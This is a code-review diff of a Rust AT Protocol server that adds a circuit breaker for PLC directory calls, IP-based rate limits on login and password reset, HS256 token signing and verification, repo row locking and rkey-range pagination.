+
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient, PlcError};
4
use crate::state::AppState;
5
use axum::{
6
extract::State,
···
184
}
185
186
let plc_client = PlcClient::new(None);
187
+
let operation_clone = input.operation.clone();
188
+
let did_clone = did.clone();
189
+
let result: Result<(), CircuitBreakerError<PlcError>> = with_circuit_breaker(
190
+
&state.circuit_breakers.plc_directory,
191
+
|| async { plc_client.send_operation(&did_clone, &operation_clone).await },
192
+
)
193
+
.await;
194
+
195
+
match result {
196
+
Ok(()) => {}
197
+
Err(CircuitBreakerError::CircuitOpen(e)) => {
198
+
warn!("PLC directory circuit breaker open: {}", e);
199
+
return (
200
+
StatusCode::SERVICE_UNAVAILABLE,
201
+
Json(json!({
202
+
"error": "ServiceUnavailable",
203
+
"message": "PLC directory service temporarily unavailable"
204
+
})),
205
+
)
206
+
.into_response();
207
+
}
208
+
Err(CircuitBreakerError::OperationFailed(e)) => {
209
+
error!("Failed to submit PLC operation: {:?}", e);
210
+
return (
211
+
StatusCode::BAD_GATEWAY,
212
+
Json(json!({
213
+
"error": "UpstreamError",
214
+
"message": format!("Failed to submit to PLC directory: {}", e)
215
+
})),
216
+
)
217
+
.into_response();
218
+
}
219
}
220
221
if let Err(e) = sqlx::query!(
+1
src/api/mod.rs
+1
src/api/mod.rs
+46
-46
src/api/repo/record/read.rs
+46
-46
src/api/repo/record/read.rs
···
167
168
let limit = input.limit.unwrap_or(50).clamp(1, 100);
169
let reverse = input.reverse.unwrap_or(false);
170
-
171
-
// Simplistic query construction - no sophisticated cursor handling or rkey ranges for now, just basic pagination
172
-
// TODO: Implement rkeyStart/End and correct cursor logic
173
-
174
let limit_i64 = limit as i64;
175
-
let rows_res = if let Some(cursor) = &input.cursor {
176
-
if reverse {
177
-
sqlx::query!(
178
-
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
179
-
user_id,
180
-
input.collection,
181
-
cursor,
182
-
limit_i64
183
-
)
184
-
.fetch_all(&state.db)
185
-
.await
186
-
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
187
-
} else {
188
-
sqlx::query!(
189
-
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
190
-
user_id,
191
-
input.collection,
192
-
cursor,
193
-
limit_i64
194
-
)
195
.fetch_all(&state.db)
196
.await
197
-
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
198
-
}
199
} else {
200
-
if reverse {
201
-
sqlx::query!(
202
-
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
203
-
user_id,
204
-
input.collection,
205
-
limit_i64
206
-
)
207
-
.fetch_all(&state.db)
208
-
.await
209
-
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
210
-
} else {
211
-
sqlx::query!(
212
-
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
213
-
user_id,
214
-
input.collection,
215
-
limit_i64
216
-
)
217
-
.fetch_all(&state.db)
218
-
.await
219
-
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
220
}
221
};
222
223
let rows = match rows_res {
···
167
168
let limit = input.limit.unwrap_or(50).clamp(1, 100);
169
let reverse = input.reverse.unwrap_or(false);
170
let limit_i64 = limit as i64;
171
+
let order = if reverse { "ASC" } else { "DESC" };
172
+
173
+
let rows_res: Result<Vec<(String, String)>, sqlx::Error> = if let Some(cursor) = &input.cursor {
174
+
let comparator = if reverse { ">" } else { "<" };
175
+
let query = format!(
176
+
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey {} $3 ORDER BY rkey {} LIMIT $4",
177
+
comparator, order
178
+
);
179
+
sqlx::query_as(&query)
180
+
.bind(user_id)
181
+
.bind(&input.collection)
182
+
.bind(cursor)
183
+
.bind(limit_i64)
184
.fetch_all(&state.db)
185
.await
186
} else {
187
+
let mut conditions = vec!["repo_id = $1", "collection = $2"];
188
+
let mut param_idx = 3;
189
+
190
+
if input.rkey_start.is_some() {
191
+
conditions.push("rkey > $3");
192
+
param_idx += 1;
193
}
194
+
195
+
if input.rkey_end.is_some() {
196
+
conditions.push(if param_idx == 3 { "rkey < $3" } else { "rkey < $4" });
197
+
param_idx += 1;
198
+
}
199
+
200
+
let limit_idx = param_idx;
201
+
202
+
let query = format!(
203
+
"SELECT rkey, record_cid FROM records WHERE {} ORDER BY rkey {} LIMIT ${}",
204
+
conditions.join(" AND "),
205
+
order,
206
+
limit_idx
207
+
);
208
+
209
+
let mut query_builder = sqlx::query_as::<_, (String, String)>(&query)
210
+
.bind(user_id)
211
+
.bind(&input.collection);
212
+
213
+
if let Some(start) = &input.rkey_start {
214
+
query_builder = query_builder.bind(start);
215
+
}
216
+
if let Some(end) = &input.rkey_end {
217
+
query_builder = query_builder.bind(end);
218
+
}
219
+
220
+
query_builder.bind(limit_i64).fetch_all(&state.db).await
221
};
222
223
let rows = match rows_res {
+28
src/api/repo/record/utils.rs
+28
src/api/repo/record/utils.rs
···
58
let mut tx = state.db.begin().await
59
.map_err(|e| format!("Failed to begin transaction: {}", e))?;
60
61
+
let lock_result = sqlx::query!(
62
+
"SELECT repo_root_cid FROM repos WHERE user_id = $1 FOR UPDATE NOWAIT",
63
+
user_id
64
+
)
65
+
.fetch_optional(&mut *tx)
66
+
.await;
67
+
68
+
match lock_result {
69
+
Err(e) => {
70
+
if let Some(db_err) = e.as_database_error() {
71
+
if db_err.code().as_deref() == Some("55P03") {
72
+
return Err("ConcurrentModification: Another request is modifying this repo".to_string());
73
+
}
74
+
}
75
+
return Err(format!("Failed to acquire repo lock: {}", e));
76
+
}
77
+
Ok(Some(row)) => {
78
+
if let Some(expected_root) = ¤t_root_cid {
79
+
if row.repo_root_cid != expected_root.to_string() {
80
+
return Err("ConcurrentModification: Repo has been modified since last read".to_string());
81
+
}
82
+
}
83
+
}
84
+
Ok(None) => {
85
+
return Err("Repo not found".to_string());
86
+
}
87
+
}
88
+
89
sqlx::query!("UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", new_root_cid.to_string(), user_id)
90
.execute(&mut *tx)
91
.await
+8
src/api/server/meta.rs
+8
src/api/server/meta.rs
···
4
5
use tracing::error;
6
7
+
pub async fn robots_txt() -> impl IntoResponse {
8
+
(
9
+
StatusCode::OK,
10
+
[("content-type", "text/plain")],
11
+
"# Hello!\n\n# Crawling the public API is allowed\nUser-agent: *\nAllow: /\n",
12
+
)
13
+
}
14
+
15
pub async fn describe_server() -> impl IntoResponse {
16
let domains_str =
17
std::env::var("AVAILABLE_USER_DOMAINS").unwrap_or_else(|_| "example.com".to_string());
+1
-1
src/api/server/mod.rs
+1
-1
src/api/server/mod.rs
···
15
pub use app_password::{create_app_password, list_app_passwords, revoke_app_password};
16
pub use email::{confirm_email, request_email_update, update_email};
17
pub use invite::{create_invite_code, create_invite_codes, get_account_invite_codes};
18
-
pub use meta::{describe_server, health};
19
pub use password::{request_password_reset, reset_password};
20
pub use service_auth::get_service_auth;
21
pub use session::{create_session, delete_session, get_session, refresh_session};
···
15
pub use app_password::{create_app_password, list_app_passwords, revoke_app_password};
16
pub use email::{confirm_email, request_email_update, update_email};
17
pub use invite::{create_invite_code, create_invite_codes, get_account_invite_codes};
18
+
pub use meta::{describe_server, health, robots_txt};
19
pub use password::{request_password_reset, reset_password};
20
pub use service_auth::get_service_auth;
21
pub use session::{create_session, delete_session, get_session, refresh_session};
+31
-1
src/api/server/password.rs
+31
-1
src/api/server/password.rs
···
2
use axum::{
3
Json,
4
extract::State,
5
-
http::StatusCode,
6
response::{IntoResponse, Response},
7
};
8
use bcrypt::{hash, DEFAULT_COST};
···
15
crate::util::generate_token_code()
16
}
17
18
#[derive(Deserialize)]
19
pub struct RequestPasswordResetInput {
20
pub email: String,
···
22
23
pub async fn request_password_reset(
24
State(state): State<AppState>,
25
Json(input): Json<RequestPasswordResetInput>,
26
) -> Response {
27
let email = input.email.trim().to_lowercase();
28
if email.is_empty() {
29
return (
···
2
use axum::{
3
Json,
4
extract::State,
5
+
http::{HeaderMap, StatusCode},
6
response::{IntoResponse, Response},
7
};
8
use bcrypt::{hash, DEFAULT_COST};
···
15
crate::util::generate_token_code()
16
}
17
18
+
fn extract_client_ip(headers: &HeaderMap) -> String {
19
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
20
+
if let Ok(value) = forwarded.to_str() {
21
+
if let Some(first_ip) = value.split(',').next() {
22
+
return first_ip.trim().to_string();
23
+
}
24
+
}
25
+
}
26
+
if let Some(real_ip) = headers.get("x-real-ip") {
27
+
if let Ok(value) = real_ip.to_str() {
28
+
return value.trim().to_string();
29
+
}
30
+
}
31
+
"unknown".to_string()
32
+
}
33
+
34
#[derive(Deserialize)]
35
pub struct RequestPasswordResetInput {
36
pub email: String,
···
38
39
pub async fn request_password_reset(
40
State(state): State<AppState>,
41
+
headers: HeaderMap,
42
Json(input): Json<RequestPasswordResetInput>,
43
) -> Response {
44
+
let client_ip = extract_client_ip(&headers);
45
+
if state.rate_limiters.password_reset.check_key(&client_ip).is_err() {
46
+
warn!(ip = %client_ip, "Password reset rate limit exceeded");
47
+
return (
48
+
StatusCode::TOO_MANY_REQUESTS,
49
+
Json(json!({
50
+
"error": "RateLimitExceeded",
51
+
"message": "Too many password reset requests. Please try again later."
52
+
})),
53
+
)
54
+
.into_response();
55
+
}
56
+
57
let email = input.email.trim().to_lowercase();
58
if email.is_empty() {
59
return (
+31
src/api/server/session.rs
+31
src/api/server/session.rs
···
4
use axum::{
5
Json,
6
extract::State,
7
response::{IntoResponse, Response},
8
};
9
use bcrypt::verify;
···
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
14
#[derive(Deserialize)]
15
pub struct CreateSessionInput {
16
pub identifier: String,
···
28
29
pub async fn create_session(
30
State(state): State<AppState>,
31
Json(input): Json<CreateSessionInput>,
32
) -> Response {
33
info!("create_session called");
34
35
let row = match sqlx::query!(
36
"SELECT u.id, u.did, u.handle, u.password_hash, k.key_bytes, k.encryption_version FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.handle = $1 OR u.email = $1",
···
4
use axum::{
5
Json,
6
extract::State,
7
+
http::{HeaderMap, StatusCode},
8
response::{IntoResponse, Response},
9
};
10
use bcrypt::verify;
···
12
use serde_json::json;
13
use tracing::{error, info, warn};
14
15
+
fn extract_client_ip(headers: &HeaderMap) -> String {
16
+
if let Some(forwarded) = headers.get("x-forwarded-for") {
17
+
if let Ok(value) = forwarded.to_str() {
18
+
if let Some(first_ip) = value.split(',').next() {
19
+
return first_ip.trim().to_string();
20
+
}
21
+
}
22
+
}
23
+
if let Some(real_ip) = headers.get("x-real-ip") {
24
+
if let Ok(value) = real_ip.to_str() {
25
+
return value.trim().to_string();
26
+
}
27
+
}
28
+
"unknown".to_string()
29
+
}
30
+
31
#[derive(Deserialize)]
32
pub struct CreateSessionInput {
33
pub identifier: String,
···
45
46
pub async fn create_session(
47
State(state): State<AppState>,
48
+
headers: HeaderMap,
49
Json(input): Json<CreateSessionInput>,
50
) -> Response {
51
info!("create_session called");
52
+
53
+
let client_ip = extract_client_ip(&headers);
54
+
if state.rate_limiters.login.check_key(&client_ip).is_err() {
55
+
warn!(ip = %client_ip, "Login rate limit exceeded");
56
+
return (
57
+
StatusCode::TOO_MANY_REQUESTS,
58
+
Json(json!({
59
+
"error": "RateLimitExceeded",
60
+
"message": "Too many login attempts. Please try again later."
61
+
})),
62
+
)
63
+
.into_response();
64
+
}
65
66
let row = match sqlx::query!(
67
"SELECT u.id, u.did, u.handle, u.password_hash, k.key_bytes, k.encryption_version FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.handle = $1 OR u.email = $1",
+48
src/api/temp.rs
+48
src/api/temp.rs
···
···
1
+
use axum::{
2
+
Json,
3
+
extract::State,
4
+
http::{HeaderMap, StatusCode},
5
+
response::{IntoResponse, Response},
6
+
};
7
+
use serde::Serialize;
8
+
use serde_json::json;
9
+
10
+
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
11
+
use crate::state::AppState;
12
+
13
+
#[derive(Serialize)]
14
+
#[serde(rename_all = "camelCase")]
15
+
pub struct CheckSignupQueueOutput {
16
+
pub activated: bool,
17
+
#[serde(skip_serializing_if = "Option::is_none")]
18
+
pub place_in_queue: Option<i64>,
19
+
#[serde(skip_serializing_if = "Option::is_none")]
20
+
pub estimated_time_ms: Option<i64>,
21
+
}
22
+
23
+
pub async fn check_signup_queue(
24
+
State(state): State<AppState>,
25
+
headers: HeaderMap,
26
+
) -> Response {
27
+
if let Some(token) = extract_bearer_token_from_header(
28
+
headers.get("Authorization").and_then(|h| h.to_str().ok())
29
+
) {
30
+
if let Ok(user) = validate_bearer_token(&state.db, &token).await {
31
+
if user.is_oauth {
32
+
return (
33
+
StatusCode::FORBIDDEN,
34
+
Json(json!({
35
+
"error": "Forbidden",
36
+
"message": "OAuth credentials are not supported for this endpoint"
37
+
})),
38
+
).into_response();
39
+
}
40
+
}
41
+
}
42
+
43
+
Json(CheckSignupQueueOutput {
44
+
activated: true,
45
+
place_in_queue: None,
46
+
estimated_time_ms: None,
47
+
}).into_response()
48
+
}
+98
src/auth/token.rs
+98
src/auth/token.rs
···
3
use base64::Engine as _;
4
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
5
use chrono::{DateTime, Duration, Utc};
6
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
7
use uuid;
8
9
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
10
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
···
118
119
Ok(format!("{}.{}", message, signature_b64))
120
}
···
3
use base64::Engine as _;
4
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
5
use chrono::{DateTime, Duration, Utc};
6
+
use hmac::{Hmac, Mac};
7
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
8
+
use sha2::Sha256;
9
use uuid;
10
+
11
+
type HmacSha256 = Hmac<Sha256>;
12
13
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
14
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
···
122
123
Ok(format!("{}.{}", message, signature_b64))
124
}
125
+
126
+
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
127
+
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
128
+
}
129
+
130
+
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
131
+
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
132
+
}
133
+
134
+
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
135
+
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
136
+
}
137
+
138
+
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
139
+
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
140
+
}
141
+
142
+
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
143
+
let expiration = Utc::now()
144
+
.checked_add_signed(Duration::seconds(60))
145
+
.expect("valid timestamp")
146
+
.timestamp();
147
+
148
+
let claims = Claims {
149
+
iss: did.to_owned(),
150
+
sub: did.to_owned(),
151
+
aud: aud.to_owned(),
152
+
exp: expiration as usize,
153
+
iat: Utc::now().timestamp() as usize,
154
+
scope: None,
155
+
lxm: Some(lxm.to_string()),
156
+
jti: uuid::Uuid::new_v4().to_string(),
157
+
};
158
+
159
+
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
160
+
}
161
+
162
+
fn create_hs256_token_with_metadata(
163
+
did: &str,
164
+
scope: &str,
165
+
typ: &str,
166
+
secret: &[u8],
167
+
duration: Duration,
168
+
) -> Result<TokenWithMetadata> {
169
+
let expires_at = Utc::now()
170
+
.checked_add_signed(duration)
171
+
.expect("valid timestamp");
172
+
let expiration = expires_at.timestamp();
173
+
let jti = uuid::Uuid::new_v4().to_string();
174
+
175
+
let claims = Claims {
176
+
iss: did.to_owned(),
177
+
sub: did.to_owned(),
178
+
aud: format!(
179
+
"did:web:{}",
180
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
181
+
),
182
+
exp: expiration as usize,
183
+
iat: Utc::now().timestamp() as usize,
184
+
scope: Some(scope.to_string()),
185
+
lxm: None,
186
+
jti: jti.clone(),
187
+
};
188
+
189
+
let token = sign_claims_hs256(claims, typ, secret)?;
190
+
Ok(TokenWithMetadata {
191
+
token,
192
+
jti,
193
+
expires_at,
194
+
})
195
+
}
196
+
197
+
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
198
+
let header = Header {
199
+
alg: "HS256".to_string(),
200
+
typ: typ.to_string(),
201
+
};
202
+
203
+
let header_json = serde_json::to_string(&header)?;
204
+
let claims_json = serde_json::to_string(&claims)?;
205
+
206
+
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
207
+
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
208
+
209
+
let message = format!("{}.{}", header_b64, claims_b64);
210
+
211
+
let mut mac = HmacSha256::new_from_slice(secret)
212
+
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
213
+
mac.update(message.as_bytes());
214
+
let signature = mac.finalize().into_bytes();
215
+
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
216
+
217
+
Ok(format!("{}.{}", message, signature_b64))
218
+
}
+106
src/auth/verify.rs
+106
src/auth/verify.rs
···
4
use base64::Engine as _;
5
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
6
use chrono::Utc;
7
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
8
9
pub fn get_did_from_token(token: &str) -> Result<String, String> {
10
let parts: Vec<&str> = token.split('.').collect();
···
63
)
64
}
65
66
fn verify_token_internal(
67
token: &str,
68
key_bytes: &[u8],
···
124
125
Ok(TokenData { claims })
126
}
···
4
use base64::Engine as _;
5
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
6
use chrono::Utc;
7
+
use hmac::{Hmac, Mac};
8
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
9
+
use sha2::Sha256;
10
+
use subtle::ConstantTimeEq;
11
+
12
+
type HmacSha256 = Hmac<Sha256>;
13
14
pub fn get_did_from_token(token: &str) -> Result<String, String> {
15
let parts: Vec<&str> = token.split('.').collect();
···
68
)
69
}
70
71
+
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
72
+
verify_token_hs256_internal(
73
+
token,
74
+
secret,
75
+
Some(TOKEN_TYPE_ACCESS),
76
+
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
77
+
)
78
+
}
79
+
80
+
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
81
+
verify_token_hs256_internal(
82
+
token,
83
+
secret,
84
+
Some(TOKEN_TYPE_REFRESH),
85
+
Some(&[SCOPE_REFRESH]),
86
+
)
87
+
}
88
+
89
fn verify_token_internal(
90
token: &str,
91
key_bytes: &[u8],
···
147
148
Ok(TokenData { claims })
149
}
150
+
151
+
fn verify_token_hs256_internal(
152
+
token: &str,
153
+
secret: &[u8],
154
+
expected_typ: Option<&str>,
155
+
allowed_scopes: Option<&[&str]>,
156
+
) -> Result<TokenData<Claims>> {
157
+
let parts: Vec<&str> = token.split('.').collect();
158
+
if parts.len() != 3 {
159
+
return Err(anyhow!("Invalid token format"));
160
+
}
161
+
162
+
let header_b64 = parts[0];
163
+
let claims_b64 = parts[1];
164
+
let signature_b64 = parts[2];
165
+
166
+
let header_bytes = URL_SAFE_NO_PAD
167
+
.decode(header_b64)
168
+
.context("Base64 decode of header failed")?;
169
+
let header: Header =
170
+
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
171
+
172
+
if header.alg != "HS256" {
173
+
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
174
+
}
175
+
176
+
if let Some(expected) = expected_typ {
177
+
if header.typ != expected {
178
+
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
179
+
}
180
+
}
181
+
182
+
let signature_bytes = URL_SAFE_NO_PAD
183
+
.decode(signature_b64)
184
+
.context("Base64 decode of signature failed")?;
185
+
186
+
let message = format!("{}.{}", header_b64, claims_b64);
187
+
let mut mac = HmacSha256::new_from_slice(secret)
188
+
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
189
+
mac.update(message.as_bytes());
190
+
let expected_signature = mac.finalize().into_bytes();
191
+
192
+
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
193
+
if !is_valid {
194
+
return Err(anyhow!("Signature verification failed"));
195
+
}
196
+
197
+
let claims_bytes = URL_SAFE_NO_PAD
198
+
.decode(claims_b64)
199
+
.context("Base64 decode of claims failed")?;
200
+
let claims: Claims =
201
+
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
202
+
203
+
let now = Utc::now().timestamp() as usize;
204
+
if claims.exp < now {
205
+
return Err(anyhow!("Token expired"));
206
+
}
207
+
208
+
if let Some(scopes) = allowed_scopes {
209
+
let token_scope = claims.scope.as_deref().unwrap_or("");
210
+
if !scopes.contains(&token_scope) {
211
+
return Err(anyhow!("Invalid token scope: {}", token_scope));
212
+
}
213
+
}
214
+
215
+
Ok(TokenData { claims })
216
+
}
217
+
218
+
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
219
+
let parts: Vec<&str> = token.split('.').collect();
220
+
if parts.len() != 3 {
221
+
return Err("Invalid token format".to_string());
222
+
}
223
+
224
+
let header_bytes = URL_SAFE_NO_PAD
225
+
.decode(parts[0])
226
+
.map_err(|e| format!("Base64 decode failed: {}", e))?;
227
+
228
+
let header: Header =
229
+
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
230
+
231
+
Ok(header.alg)
232
+
}
+307
src/circuit_breaker.rs
+307
src/circuit_breaker.rs
···
···
1
+
use std::sync::atomic::{AtomicU32, AtomicU64, Ordering};
2
+
use std::sync::Arc;
3
+
use std::time::Duration;
4
+
use tokio::sync::RwLock;
5
+
6
+
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
7
+
pub enum CircuitState {
8
+
Closed,
9
+
Open,
10
+
HalfOpen,
11
+
}
12
+
13
+
pub struct CircuitBreaker {
14
+
name: String,
15
+
failure_threshold: u32,
16
+
success_threshold: u32,
17
+
timeout: Duration,
18
+
state: Arc<RwLock<CircuitState>>,
19
+
failure_count: AtomicU32,
20
+
success_count: AtomicU32,
21
+
last_failure_time: AtomicU64,
22
+
}
23
+
24
+
impl CircuitBreaker {
25
+
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
26
+
Self {
27
+
name: name.to_string(),
28
+
failure_threshold,
29
+
success_threshold,
30
+
timeout: Duration::from_secs(timeout_secs),
31
+
state: Arc::new(RwLock::new(CircuitState::Closed)),
32
+
failure_count: AtomicU32::new(0),
33
+
success_count: AtomicU32::new(0),
34
+
last_failure_time: AtomicU64::new(0),
35
+
}
36
+
}
37
+
38
+
pub async fn can_execute(&self) -> bool {
39
+
let state = self.state.read().await;
40
+
match *state {
41
+
CircuitState::Closed => true,
42
+
CircuitState::Open => {
43
+
let last_failure = self.last_failure_time.load(Ordering::SeqCst);
44
+
let now = std::time::SystemTime::now()
45
+
.duration_since(std::time::UNIX_EPOCH)
46
+
.unwrap()
47
+
.as_secs();
48
+
49
+
if now - last_failure >= self.timeout.as_secs() {
50
+
drop(state);
51
+
let mut state = self.state.write().await;
52
+
if *state == CircuitState::Open {
53
+
*state = CircuitState::HalfOpen;
54
+
self.success_count.store(0, Ordering::SeqCst);
55
+
tracing::info!(circuit = %self.name, "Circuit breaker transitioning to half-open");
56
+
return true;
57
+
}
58
+
}
59
+
false
60
+
}
61
+
CircuitState::HalfOpen => true,
62
+
}
63
+
}
64
+
65
+
pub async fn record_success(&self) {
66
+
let state = *self.state.read().await;
67
+
68
+
match state {
69
+
CircuitState::Closed => {
70
+
self.failure_count.store(0, Ordering::SeqCst);
71
+
}
72
+
CircuitState::HalfOpen => {
73
+
let count = self.success_count.fetch_add(1, Ordering::SeqCst) + 1;
74
+
if count >= self.success_threshold {
75
+
let mut state = self.state.write().await;
76
+
*state = CircuitState::Closed;
77
+
self.failure_count.store(0, Ordering::SeqCst);
78
+
self.success_count.store(0, Ordering::SeqCst);
79
+
tracing::info!(circuit = %self.name, "Circuit breaker closed after successful recovery");
80
+
}
81
+
}
82
+
CircuitState::Open => {}
83
+
}
84
+
}
85
+
86
+
pub async fn record_failure(&self) {
87
+
let state = *self.state.read().await;
88
+
89
+
match state {
90
+
CircuitState::Closed => {
91
+
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
92
+
if count >= self.failure_threshold {
93
+
let mut state = self.state.write().await;
94
+
*state = CircuitState::Open;
95
+
let now = std::time::SystemTime::now()
96
+
.duration_since(std::time::UNIX_EPOCH)
97
+
.unwrap()
98
+
.as_secs();
99
+
self.last_failure_time.store(now, Ordering::SeqCst);
100
+
tracing::warn!(
101
+
circuit = %self.name,
102
+
failures = count,
103
+
"Circuit breaker opened after {} failures",
104
+
count
105
+
);
106
+
}
107
+
}
108
+
CircuitState::HalfOpen => {
109
+
let mut state = self.state.write().await;
110
+
*state = CircuitState::Open;
111
+
let now = std::time::SystemTime::now()
112
+
.duration_since(std::time::UNIX_EPOCH)
113
+
.unwrap()
114
+
.as_secs();
115
+
self.last_failure_time.store(now, Ordering::SeqCst);
116
+
self.success_count.store(0, Ordering::SeqCst);
117
+
tracing::warn!(circuit = %self.name, "Circuit breaker reopened after failure in half-open state");
118
+
}
119
+
CircuitState::Open => {}
120
+
}
121
+
}
122
+
123
+
pub async fn state(&self) -> CircuitState {
124
+
*self.state.read().await
125
+
}
126
+
127
+
pub fn name(&self) -> &str {
128
+
&self.name
129
+
}
130
+
}
131
+
132
+
#[derive(Clone)]
133
+
pub struct CircuitBreakers {
134
+
pub plc_directory: Arc<CircuitBreaker>,
135
+
pub relay_notification: Arc<CircuitBreaker>,
136
+
}
137
+
138
+
impl Default for CircuitBreakers {
139
+
fn default() -> Self {
140
+
Self::new()
141
+
}
142
+
}
143
+
144
+
impl CircuitBreakers {
145
+
pub fn new() -> Self {
146
+
Self {
147
+
plc_directory: Arc::new(CircuitBreaker::new("plc_directory", 5, 3, 60)),
148
+
relay_notification: Arc::new(CircuitBreaker::new("relay_notification", 10, 5, 30)),
149
+
}
150
+
}
151
+
}
152
+
153
+
#[derive(Debug)]
154
+
pub struct CircuitOpenError {
155
+
pub circuit_name: String,
156
+
}
157
+
158
+
impl std::fmt::Display for CircuitOpenError {
159
+
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
160
+
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
161
+
}
162
+
}
163
+
164
+
impl std::error::Error for CircuitOpenError {}
165
+
166
+
pub async fn with_circuit_breaker<T, E, F, Fut>(
167
+
circuit: &CircuitBreaker,
168
+
operation: F,
169
+
) -> Result<T, CircuitBreakerError<E>>
170
+
where
171
+
F: FnOnce() -> Fut,
172
+
Fut: std::future::Future<Output = Result<T, E>>,
173
+
{
174
+
if !circuit.can_execute().await {
175
+
return Err(CircuitBreakerError::CircuitOpen(CircuitOpenError {
176
+
circuit_name: circuit.name().to_string(),
177
+
}));
178
+
}
179
+
180
+
match operation().await {
181
+
Ok(result) => {
182
+
circuit.record_success().await;
183
+
Ok(result)
184
+
}
185
+
Err(e) => {
186
+
circuit.record_failure().await;
187
+
Err(CircuitBreakerError::OperationFailed(e))
188
+
}
189
+
}
190
+
}
191
+
192
+
#[derive(Debug)]
193
+
pub enum CircuitBreakerError<E> {
194
+
CircuitOpen(CircuitOpenError),
195
+
OperationFailed(E),
196
+
}
197
+
198
+
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
199
+
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
200
+
match self {
201
+
CircuitBreakerError::CircuitOpen(e) => write!(f, "{}", e),
202
+
CircuitBreakerError::OperationFailed(e) => write!(f, "Operation failed: {}", e),
203
+
}
204
+
}
205
+
}
206
+
207
+
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
208
+
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
209
+
match self {
210
+
CircuitBreakerError::CircuitOpen(e) => Some(e),
211
+
CircuitBreakerError::OperationFailed(e) => Some(e),
212
+
}
213
+
}
214
+
}
215
+
216
+
#[cfg(test)]
217
+
mod tests {
218
+
use super::*;
219
+
220
+
#[tokio::test]
221
+
async fn test_circuit_breaker_starts_closed() {
222
+
let cb = CircuitBreaker::new("test", 3, 2, 10);
223
+
assert_eq!(cb.state().await, CircuitState::Closed);
224
+
assert!(cb.can_execute().await);
225
+
}
226
+
227
+
#[tokio::test]
228
+
async fn test_circuit_breaker_opens_after_failures() {
229
+
let cb = CircuitBreaker::new("test", 3, 2, 10);
230
+
231
+
cb.record_failure().await;
232
+
assert_eq!(cb.state().await, CircuitState::Closed);
233
+
234
+
cb.record_failure().await;
235
+
assert_eq!(cb.state().await, CircuitState::Closed);
236
+
